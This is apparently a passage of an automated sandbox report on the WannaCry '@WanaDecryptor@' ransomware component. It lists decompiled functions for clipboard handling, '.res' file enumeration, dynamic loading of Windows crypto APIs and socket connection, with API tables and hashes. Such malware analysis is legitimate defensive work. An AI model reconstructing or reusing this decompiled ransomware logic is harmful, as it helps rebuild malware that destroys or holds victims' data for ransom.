								L00412CC2();
								_t121 = _t121 + 1;
							} while (_t121 < SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0));
						}
						_t122 = GlobalAlloc(2, _t126 + 2);
						 *(_t130 + 0x14) = _t122;
						if(_t122 != 0) {
							_t54 = GlobalLock(_t122);
							 *(_t130 + 0x10) = _t54;
							if(_t54 != 0) {
								_t78 = 0;
								_t128 = 0;
								_t55 = SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0);
								if(_t55 > 0) {
									while(1) {
										_push(0);
										_push(_t78);
										_push(_t130 + 0x24);
										L00412D7C();
										_push(0x4206e0);
										_push(_t55);
										 *((intOrPtr*)(_t130 + 0x304)) = 3;
										_push(_t130 + 0x24);
										L00412CCE();
										 *(_t130 + 0x2fc) = 5;
										L00412CC2();
										_t86 =  *0x42179c; // 0x0
										 *(_t130 + 0x24) = _t86;
										memset(_t130 + 0x26, 0, 0xb3 << 2);
										_t132 = _t130 + 0xc;
										asm("stosw");
										MultiByteToWideChar(0, 0,  *(_t132 + 0x1c), 0xffffffff, _t130 + 0x24, 0x167);
										_t64 = wcslen(_t132 + 0x24);
										_t123 = _t132 + 0x28;
										_t92 = _t64 << 1 >> 2;
										memcpy(_t123 + _t92 + _t92, _t123, memcpy( *((intOrPtr*)(_t132 + 0x14)) + _t128, _t123, _t92 << 2) & 0x00000003);
										_t134 = _t132 + 0x18;
										_t68 = wcslen(_t134 + 0x28);
										_t130 = _t134 + 8;
										_t128 = _t128 + _t68 * 2;
										 *(_t130 + 0x2fc) = 0xffffffff;
										L00412CC2();
										_t78 = _t78 + 1;
										_t55 = SendMessageA( *( *((intOrPtr*)(_t130 + 0x18)) + 0x80), 0x1004, 0, 0);
										if(_t78 >= _t55) {
											break;
										}
										_t110 =  *((intOrPtr*)(_t130 + 0x18));
									}
									_t122 =  *(_t130 + 0x14);
								}
								 *((short*)( *(_t130 + 0x10) + _t128)) = 0;
								GlobalUnlock(_t122);
								EmptyClipboard();
								SetClipboardData(0xd, _t122);
							} else {
								GlobalFree(_t122);
							}
						}
						_t51 = CloseClipboard();
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t130 + 0x2f4));
				return _t51;
			}






















                                                      0x004035a0
                                                      0x004035a2
                                                      0x004035ad
                                                      0x004035ae
                                                      0x004035b5
                                                      0x004035c5
                                                      0x004035d7
                                                      0x004035db
                                                      0x004035df
                                                      0x004035e9
                                                      0x004035f1
                                                      0x004035fd
                                                      0x00403607
                                                      0x0040360d
                                                      0x0040360f
                                                      0x0040360f
                                                      0x00403611
                                                      0x00403615
                                                      0x00403616
                                                      0x0040361a
                                                      0x0040361f
                                                      0x00403628
                                                      0x00403629
                                                      0x0040362a
                                                      0x00403635
                                                      0x0040363e
                                                      0x00403646
                                                      0x00403653
                                                      0x00403661
                                                      0x00403665
                                                      0x0040367a
                                                      0x0040367d
                                                      0x0040360f
                                                      0x0040368d
                                                      0x00403691
                                                      0x00403695
                                                      0x0040369c
                                                      0x004036a4
                                                      0x004036a8
                                                      0x004036bc
                                                      0x004036c6
                                                      0x004036c8
                                                      0x004036d0
                                                      0x004036dc
                                                      0x004036dc
                                                      0x004036e2
                                                      0x004036e3
                                                      0x004036e7
                                                      0x004036ec
                                                      0x004036f1
                                                      0x004036f6
                                                      0x00403701
                                                      0x00403702
                                                      0x0040370b
                                                      0x00403713
                                                      0x00403718
                                                      0x00403721
                                                      0x00403733
                                                      0x00403733
                                                      0x00403735
                                                      0x00403748
                                                      0x00403753
                                                      0x00403763
                                                      0x0040376a
                                                      0x00403774
                                                      0x00403774
                                                      0x0040377b
                                                      0x00403781
                                                      0x00403788
                                                      0x0040378c
                                                      0x00403797
                                                      0x004037af
                                                      0x004037b1
                                                      0x004037b9
                                                      0x00000000
                                                      0x00000000
                                                      0x004036d8
                                                      0x004036d8
                                                      0x004037bf
                                                      0x004037bf
                                                      0x004037c8
                                                      0x004037ce
                                                      0x004037d4
                                                      0x004037dd
                                                      0x004036aa
                                                      0x004036ab
                                                      0x004036ab
                                                      0x004036a8
                                                      0x004037e3
                                                      0x004037e3
                                                      0x004035f1
                                                      0x004037f4
                                                      0x00403801

                                                      APIs
                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004035DB
                                                      • OpenClipboard.USER32(?), ref: 004035E9
                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00403609
                                                      • #3301.MFC42(?,00000000,00000000), ref: 0040361A
                                                      • #924.MFC42 ref: 00403635
                                                      • #800.MFC42 ref: 00403646
                                                      • #800.MFC42 ref: 00403665
                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040367B
                                                      • GlobalAlloc.KERNEL32(00000002,-00000002), ref: 00403687
                                                      • GlobalLock.KERNEL32(00000000), ref: 0040369C
                                                      • GlobalFree.KERNEL32(00000000), ref: 004036AB
                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004036C8
                                                      • #3301.MFC42(?,00000000,00000000), ref: 004036E7
                                                      • #924.MFC42(00000000), ref: 00403702
                                                      • #800.MFC42(00000000), ref: 00403713
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000167,00000000), ref: 00403748
                                                      • wcslen.MSVCRT ref: 00403753
                                                      • wcslen.MSVCRT ref: 0040377B
                                                      • #800.MFC42 ref: 00403797
                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004037B1
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004037CE
                                                      • EmptyClipboard.USER32 ref: 004037D4
                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004037DD
                                                      • CloseClipboard.USER32 ref: 004037E3
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#800ClipboardGlobal$#3301#924wcslen$AllocByteCharCloseDataEmptyFreeLockMultiOpenUnlockWide
                                                      • String ID:
                                                      • API String ID: 3405503685-0
                                                      • Opcode ID: 8830a6fbde82a0506a617069f42227a829ac694ec6c697a23238cf2d660267b9
                                                      • Instruction ID: c86228cefcec1f34603e32cf9825c4429cf2ad1f23db843e272d7cdac5f24a66
                                                      • Opcode Fuzzy Hash: 8830a6fbde82a0506a617069f42227a829ac694ec6c697a23238cf2d660267b9
                                                      • Instruction Fuzzy Hash: 0151E571204706ABD320DF64DC45FEBB7A8FB88754F10462DF249A72D0DB749909CBAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00403CB0 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 122filewindowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 69%
                                                      			E00403CB0(struct _WIN32_FIND_DATAA* __ecx) {
				void* _t31;
				int _t34;
				int _t37;
				intOrPtr _t39;
				int _t42;
				struct _WIN32_FIND_DATAA* _t54;
				void* _t75;
				struct _IO_FILE* _t76;
				struct _WIN32_FIND_DATAA* _t79;
				void* _t81;
				void* _t82;
				void* _t83;
				void* _t84;

				_t54 = __ecx;
				_t79 = __ecx;
				 *((intOrPtr*)(_t81 + 0xc)) = __ecx;
				_t31 = FindFirstFileA("*.res", _t81 + 0xcc);
				 *(_t81 + 8) = _t31;
				if(_t31 != 0xffffffff) {
					goto L3;
					L14:
					_t75 =  *(_t81 + 0x14);
					_t54 = _t81 + 0xdc;
					if(FindNextFileA(_t75, _t54) != 0) {
						L3:
						if(( *(_t81 + 0xdc) & 0x00000010) == 0) {
							asm("repne scasb");
							if( !(_t54 | 0xffffffff) - 1 == 0xc) {
								_t34 = sscanf(_t81 + 0x108, "%08X.res", _t81 + 0x1c);
								_t81 = _t81 + 0xc;
								if(_t34 >= 1) {
									_t76 = fopen(_t81 + 0x108, "rb");
									_t81 = _t81 + 8;
									 *(_t81 + 0x18) = _t76;
									if(_t76 != 0) {
										_t37 = fread(_t81 + 0x5c, 0x88, 1, _t76);
										_t82 = _t81 + 0x10;
										if(_t37 == 1) {
											_t39 =  *((intOrPtr*)(_t82 + 0x1c));
											_t60 =  *((intOrPtr*)(_t82 + 0x5c));
											if( *((intOrPtr*)(_t82 + 0x5c)) == _t39) {
												if(_t39 != 0) {
													 *((char*)(_t82 + 0x21)) = 0x5c;
													 *((char*)(_t82 + 0x28)) = 0x5c;
													E00401C30(_t60, _t39, _t82 + 0x22);
													_t83 = _t82 + 8;
													_push(_t83 + 0x20);
													_push(0);
													_push(0x143);
												} else {
													sprintf(_t82 + 0x20, "My Computer");
													_t83 = _t82 + 8;
													_push(_t83 + 0x20);
													_push(0);
													_push(0x14a);
												}
												_t42 = SendMessageA( *(_t79 + 0xc0), ??, ??, ??);
												_push(0x88);
												L00412CEC();
												_t84 = _t83 + 4;
												memcpy(_t42, _t84 + 0x54, 0x22 << 2);
												_t82 = _t84 + 0xc;
												SendMessageA( *( *((intOrPtr*)(_t83 + 0x14)) + 0xc0), 0x151, _t42, _t42);
												_t76 =  *(_t82 + 0x18);
												_t79 =  *((intOrPtr*)(_t82 + 0x10));
											}
										}
										fclose(_t76);
										_t81 = _t82 + 4;
									}
								}
							}
						}
						goto L14;
					} else {
						FindClose(_t75);
						return 1;
					}
				} else {
					return 0;
				}
			}
















                                                      0x00403cb0
                                                      0x00403cbe
                                                      0x00403cc6
                                                      0x00403cca
                                                      0x00403cd3
                                                      0x00403cd7
                                                      0x00403ceb
                                                      0x00403e1f
                                                      0x00403e1f
                                                      0x00403e23
                                                      0x00403e34
                                                      0x00403cec
                                                      0x00403cf4
                                                      0x00403d06
                                                      0x00403d0e
                                                      0x00403d26
                                                      0x00403d2c
                                                      0x00403d32
                                                      0x00403d4b
                                                      0x00403d4d
                                                      0x00403d52
                                                      0x00403d56
                                                      0x00403d69
                                                      0x00403d6f
                                                      0x00403d75
                                                      0x00403d7b
                                                      0x00403d7f
                                                      0x00403d85
                                                      0x00403d8d
                                                      0x00403db4
                                                      0x00403dbb
                                                      0x00403dc0
                                                      0x00403dc5
                                                      0x00403dcc
                                                      0x00403dcd
                                                      0x00403dcf
                                                      0x00403d8f
                                                      0x00403d99
                                                      0x00403d9f
                                                      0x00403da6
                                                      0x00403da7
                                                      0x00403da9
                                                      0x00403da9
                                                      0x00403ddb
                                                      0x00403ddd
                                                      0x00403de4
                                                      0x00403ded
                                                      0x00403dfc
                                                      0x00403dfc
                                                      0x00403e0b
                                                      0x00403e0d
                                                      0x00403e11
                                                      0x00403e11
                                                      0x00403d85
                                                      0x00403e16
                                                      0x00403e1c
                                                      0x00403e1c
                                                      0x00403d56
                                                      0x00403d32
                                                      0x00403d0e
                                                      0x00000000
                                                      0x00403e3a
                                                      0x00403e3b
                                                      0x00403e50
                                                      0x00403e50
                                                      0x00403cd9
                                                      0x00403ce2
                                                      0x00403ce2

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$FileMessageSend$#823CloseFirstNextfclosefopenfreadsprintfsscanf
                                                      • String ID: %08X.res$*.res$My Computer$\$\
                                                      • API String ID: 1476605332-298172004
                                                      • Opcode ID: e7d60ef9c1856895ef116a6a5a4c73b4dd5c7b1159c6abcdc394c11f2446cc8f
                                                      • Instruction ID: 8c176cb2dc152f679f03352499a178afa0a04d74b0fbd326e0cc20a81f44b8b1
                                                      • Opcode Fuzzy Hash: e7d60ef9c1856895ef116a6a5a4c73b4dd5c7b1159c6abcdc394c11f2446cc8f
                                                      • Instruction Fuzzy Hash: F741C671508300ABE710CB54DC45FEB7799EFC4715F404A2DF984A62C1E7B8EA498B9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404B70 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 62libraryloaderCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00404B70() {
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t20;

				if( *0x4217c0 == 0) {
					_t20 = LoadLibraryA("advapi32.dll");
					if(_t20 == 0) {
						L10:
						return 0;
					} else {
						 *0x4217c0 = GetProcAddress(_t20, "CryptAcquireContextA");
						 *0x4217c4 = GetProcAddress(_t20, "CryptImportKey");
						 *0x4217c8 = GetProcAddress(_t20, "CryptDestroyKey");
						 *0x4217cc = GetProcAddress(_t20, "CryptEncrypt");
						 *0x4217d0 = GetProcAddress(_t20, "CryptDecrypt");
						_t9 = GetProcAddress(_t20, "CryptGenKey");
						 *0x4217d4 = _t9;
						if( *0x4217c0 == 0 ||  *0x4217c4 == 0 ||  *0x4217c8 == 0 ||  *0x4217cc == 0 ||  *0x4217d0 == 0 || _t9 == 0) {
							goto L10;
						} else {
							return 1;
						}
					}
				} else {
					return 1;
				}
			}





                                                      0x00404b78
                                                      0x00404b8c
                                                      0x00404b90
                                                      0x00404c29
                                                      0x00404c2c
                                                      0x00404b96
                                                      0x00404bab
                                                      0x00404bb8
                                                      0x00404bc5
                                                      0x00404bd2
                                                      0x00404bdf
                                                      0x00404be4
                                                      0x00404bec
                                                      0x00404bf4
                                                      0x00000000
                                                      0x00404c22
                                                      0x00404c28
                                                      0x00404c28
                                                      0x00404bf4
                                                      0x00404b7a
                                                      0x00404b80
                                                      0x00404b80

                                                      APIs
                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00402C46), ref: 00404B86
                                                      • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00404BA3
                                                      • GetProcAddress.KERNEL32(00000000,CryptImportKey), ref: 00404BB0
                                                      • GetProcAddress.KERNEL32(00000000,CryptDestroyKey), ref: 00404BBD
                                                      • GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 00404BCA
                                                      • GetProcAddress.KERNEL32(00000000,CryptDecrypt), ref: 00404BD7
                                                      • GetProcAddress.KERNEL32(00000000,CryptGenKey), ref: 00404BE4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad
                                                      • String ID: CryptAcquireContextA$CryptDecrypt$CryptDestroyKey$CryptEncrypt$CryptGenKey$CryptImportKey$advapi32.dll
                                                      • API String ID: 2238633743-2459060434
                                                      • Opcode ID: 76a5095adcaff83da50827021ea7e3f960384e315c05d83dddbeb63d2a682abb
                                                      • Instruction ID: 00e3496518ad86b0ae3e163ac91477e164a9cb94f9785d2b2dfdbbcf4affa7e0
                                                      • Opcode Fuzzy Hash: 76a5095adcaff83da50827021ea7e3f960384e315c05d83dddbeb63d2a682abb
                                                      • Instruction Fuzzy Hash: 441182B074635196D738AB67FD14AA726D4EFE1B01B85053BE401D3AB0C7B888028A9C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004080C0 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 143fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 87%
                                                      			E004080C0(intOrPtr __ecx) {
				void _v999;
				char _v1000;
				void* _v1012;
				char _v1100;
				char _v1200;
				char _v1476;
				signed char _v1520;
				intOrPtr _v1648;
				void _v1656;
				intOrPtr _v1660;
				intOrPtr _v1664;
				intOrPtr _v1668;
				intOrPtr _v1672;
				intOrPtr _v1696;
				void _v1788;
				void _v1792;
				void* _v1796;
				char _v1800;
				intOrPtr _v1804;
				intOrPtr _v1808;
				void* _v1820;
				char _t44;
				void* _t47;
				void* _t50;
				void* _t54;
				int _t57;
				int _t60;
				int _t62;
				struct _WIN32_FIND_DATAA* _t74;
				intOrPtr _t103;
				void* _t104;
				struct _IO_FILE* _t105;
				void* _t110;
				intOrPtr _t113;
				void* _t114;
				void* _t126;

				_t103 = __ecx;
				memset( &_v1788, 0, 0x21 << 2);
				_t44 =  *0x421798; // 0x0
				_v1000 = _t44;
				_v1808 = _t103;
				memset( &_v999, 0, 0xf9 << 2);
				_t110 =  &_v1808 + 0x18;
				asm("stosw");
				_t74 =  &_v1520;
				_v1804 = 0;
				asm("stosb");
				_t47 = FindFirstFileA("*.res", _t74);
				_v1796 = _t47;
				if(_t47 == 0xffffffff) {
					L13:
					_push(_v1804);
					_t50 = E00401E30(_t124, _t126, _v1672,  &_v1200);
					sprintf( &_v1000, "---\t%s\t%s\t%d\t%I64d\t%d", E00401E30(_t124, _t126, _v1696,  &_v1100), _t50, _v1668, _v1664, _v1660);
					_t113 = _t110 + 0x30;
					_push(0);
					_v1808 = _t113;
					L00412CAA();
					_t79 = _t103;
					_t54 = E004082C0(_t103,  &_v1000,  &_v1000);
					if(_t54 != 0xffffffff) {
						return _t54;
					}
					_push(0);
					 *((intOrPtr*)(_t113 + 0x18)) = _t113;
					L00412CAA();
					return E004082C0(_t103, _t113 + 0x340, _t79);
				} else {
					goto L2;
					L11:
					_t104 = _v1796;
					_t74 =  &_v1520;
					_t57 = FindNextFileA(_t104, _t74);
					_t124 = _t57;
					if(_t57 != 0) {
						L2:
						if((_v1520 & 0x00000010) == 0) {
							asm("repne scasb");
							if( !(_t74 | 0xffffffff) - 1 == 0xc) {
								_t60 = sscanf( &_v1476, "%08X.res",  &_v1800);
								_t110 = _t110 + 0xc;
								if(_t60 >= 1) {
									_t105 = fopen( &_v1476, "rb");
									_t110 = _t110 + 8;
									if(_t105 != 0) {
										_t62 = fread( &_v1656, 0x88, 1, _t105);
										_t114 = _t110 + 0x10;
										if(_t62 == 1 && _v1648 == _v1800) {
											_v1804 = _v1804 + 1;
										}
										fclose(_t105);
										_t110 = _t114 + 4;
										if(_v1648 == 0) {
											memcpy( &_v1792,  &_v1656, 0x22 << 2);
											_t110 = _t110 + 0xc;
										}
									}
								}
							}
						}
						goto L11;
					} else {
						FindClose(_t104);
						_t103 = _v1808;
						goto L13;
					}
				}
			}







































                                                      0x004080c9
                                                      0x004080d7
                                                      0x004080d9
                                                      0x004080e3
                                                      0x004080f3
                                                      0x004080f7
                                                      0x004080f7
                                                      0x004080f9
                                                      0x004080fb
                                                      0x00408102
                                                      0x00408110
                                                      0x00408111
                                                      0x0040811a
                                                      0x0040811e
                                                      0x0040820a
                                                      0x0040821c
                                                      0x00408237
                                                      0x00408266
                                                      0x0040826c
                                                      0x00408276
                                                      0x0040827b
                                                      0x00408280
                                                      0x00408285
                                                      0x00408287
                                                      0x0040828f
                                                      0x004082b8
                                                      0x004082b8
                                                      0x00408291
                                                      0x0040829d
                                                      0x004082a2
                                                      0x00000000
                                                      0x00408124
                                                      0x0040812a
                                                      0x004081e4
                                                      0x004081e4
                                                      0x004081e8
                                                      0x004081f1
                                                      0x004081f7
                                                      0x004081f9
                                                      0x00408130
                                                      0x00408138
                                                      0x0040814a
                                                      0x00408152
                                                      0x0040816a
                                                      0x00408170
                                                      0x00408176
                                                      0x00408187
                                                      0x00408189
                                                      0x0040818e
                                                      0x004081a0
                                                      0x004081a2
                                                      0x004081a8
                                                      0x004081b9
                                                      0x004081b9
                                                      0x004081be
                                                      0x004081cb
                                                      0x004081d0
                                                      0x004081e2
                                                      0x004081e2
                                                      0x004081e2
                                                      0x004081d0
                                                      0x0040818e
                                                      0x00408176
                                                      0x00408152
                                                      0x00000000
                                                      0x004081ff
                                                      0x00408200
                                                      0x00408206
                                                      0x00000000
                                                      0x00408206
                                                      0x004081f9

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$#537File$CloseFirstNextfclosefopenfreadsprintfsscanf
                                                      • String ID: %08X.res$*.res$---%s%s%d%I64d%d
                                                      • API String ID: 1530363904-2310201135
                                                      • Opcode ID: 246f558812f6a4b1f5d00500c0ea839226a98d7eebb8d8b9e36566a9c1167d01
                                                      • Instruction ID: f4d275e2d06bc6c2fe64a46714bc06f3fac9236f3415a442fab0096444624429
                                                      • Opcode Fuzzy Hash: 246f558812f6a4b1f5d00500c0ea839226a98d7eebb8d8b9e36566a9c1167d01
                                                      • Instruction Fuzzy Hash: F051B370604740ABD634CB24DD45BEF77E9EFC4314F00492EF98897291DB78AA098B9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040D6A0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • htons.WS2_32 ref: 0040D6C7
                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 0040D6E1
                                                      • bind.WS2_32(00000000,?,00000010), ref: 0040D709
                                                      • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0040D728
                                                      • connect.WS2_32(00000000,?,00000010), ref: 0040D73A
                                                      • select.WS2_32(00000001,?,?,00000000,00000001), ref: 0040D781
                                                      • __WSAFDIsSet.WS2_32(00000000,?), ref: 0040D791
                                                      • __WSAFDIsSet.WS2_32(00000000,?), ref: 0040D7A3
                                                      • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0040D7BB
                                                      • setsockopt.WS2_32(00000000), ref: 0040D7DD
                                                      • setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 0040D7F1
                                                      • closesocket.WS2_32(00000000), ref: 0040D80E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ioctlsocketsetsockopt$bindclosesocketconnecthtonsselectsocket
                                                      • String ID: `
                                                      • API String ID: 478405425-1850852036
                                                      • Opcode ID: 207a0d99be8aa74ddfaa5851ea6aa8d1a80ed73a610e947c43882b9ed202ce50
                                                      • Instruction ID: 6de462713d41b41c0891f3cf9d152f402d0f08cb5dc9382bbec9442f00cca922
                                                      • Opcode Fuzzy Hash: 207a0d99be8aa74ddfaa5851ea6aa8d1a80ed73a610e947c43882b9ed202ce50
                                                      • Instruction Fuzzy Hash: 83418372504341AED320DF55DC84EEFB7E8EFC8714F40892EF558D6290E7B495088BAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00411CF0 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 450COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 91%
                                                      			E00411CF0(intOrPtr* __ecx) {
				intOrPtr _t142;
				signed int _t147;
				signed int _t149;
				intOrPtr _t150;
				void* _t152;
				signed int _t157;
				signed int _t160;
				unsigned int _t162;
				signed char _t164;
				struct _FILETIME _t177;
				struct _FILETIME _t180;
				intOrPtr _t182;
				signed int _t186;
				signed char _t188;
				struct _FILETIME _t204;
				struct _FILETIME _t212;
				signed int _t215;
				signed int _t217;
				signed int _t219;
				intOrPtr* _t226;
				signed int _t231;
				signed int _t232;
				signed int _t234;
				signed int _t235;
				signed int _t239;
				unsigned int _t248;
				signed int _t249;
				int _t252;
				signed char _t264;
				intOrPtr _t269;
				intOrPtr* _t273;
				signed int _t276;
				unsigned int _t297;
				signed int _t299;
				intOrPtr _t300;
				signed int _t303;
				intOrPtr _t307;
				intOrPtr _t309;
				signed int _t311;
				intOrPtr _t312;
				intOrPtr _t313;
				intOrPtr* _t321;
				signed int _t329;
				intOrPtr* _t336;
				void* _t337;
				void* _t338;
				signed int _t340;
				signed int _t341;
				void* _t343;
				void* _t346;
				void* _t348;
				void* _t349;
				void* _t350;
				void* _t351;
				void* _t353;
				void* _t354;
				void* _t355;
				void* _t356;

				_t312 =  *((intOrPtr*)(_t348 + 0x294));
				_t232 = _t231 | 0xffffffff;
				_t336 = __ecx;
				 *((intOrPtr*)(_t348 + 0x1c)) = __ecx;
				if(_t312 < _t232) {
					L72:
					return 0x10000;
				} else {
					_t140 =  *__ecx;
					if(_t312 >=  *((intOrPtr*)( *__ecx + 4))) {
						goto L72;
					} else {
						if( *((intOrPtr*)(__ecx + 4)) != _t232) {
							E00411AC0(_t140);
							_t348 = _t348 + 4;
						}
						 *(_t336 + 4) = _t232;
						if(_t312 !=  *((intOrPtr*)(_t336 + 0x134))) {
							__eflags = _t312 - _t232;
							if(_t312 != _t232) {
								_t142 =  *_t336;
								__eflags = _t312 -  *((intOrPtr*)(_t142 + 0x10));
								if(_t312 <  *((intOrPtr*)(_t142 + 0x10))) {
									E00411390(_t142);
									_t348 = _t348 + 4;
								}
								_t143 =  *_t336;
								__eflags =  *( *_t336 + 0x10) - _t312;
								while(__eflags < 0) {
									E004113E0(_t143);
									_t143 =  *_t336;
									_t348 = _t348 + 4;
									__eflags =  *( *_t336 + 0x10) - _t312;
								}
								E00411350( *_t336, _t348 + 0x4c, _t348 + 0x98, 0x104, 0, 0, 0, 0);
								_t147 = E00411460(__eflags,  *_t336, _t348 + 0x58, _t348 + 0x40, _t348 + 0x30);
								_t349 = _t348 + 0x30;
								__eflags = _t147;
								if(_t147 == 0) {
									_t149 = E00410A50( *((intOrPtr*)( *_t336)),  *((intOrPtr*)(_t349 + 0x20)), 0);
									_t350 = _t349 + 0xc;
									__eflags = _t149;
									if(_t149 == 0) {
										_t150 =  *((intOrPtr*)(_t350 + 0x10));
										_push(_t150);
										L00412CEC();
										_t313 = _t150;
										 *((intOrPtr*)(_t350 + 0x1c)) = _t313;
										_t152 = E00410AF0(_t313, 1,  *((intOrPtr*)(_t350 + 0x14)),  *((intOrPtr*)( *_t336)));
										_t351 = _t350 + 0x14;
										__eflags = _t152 -  *((intOrPtr*)(_t350 + 0x24));
										if(_t152 ==  *((intOrPtr*)(_t350 + 0x24))) {
											_t346 =  *(_t351 + 0x29c);
											asm("repne scasb");
											_t248 =  !_t232;
											 *_t346 =  *( *_t336 + 0x10);
											_t337 = _t351 + 0x88 - _t248;
											_t249 = _t248 >> 2;
											_t252 = memcpy(_t351 + 0x190, _t337, _t249 << 2) & 0x00000003;
											__eflags = _t252;
											memcpy(_t337 + _t249 + _t249, _t337, _t252);
											_t353 = _t351 + 0x18;
											_t321 = _t353 + 0x190;
											while(1) {
												_t157 =  *_t321;
												__eflags = _t157;
												if(_t157 == 0) {
													goto L23;
												}
												L21:
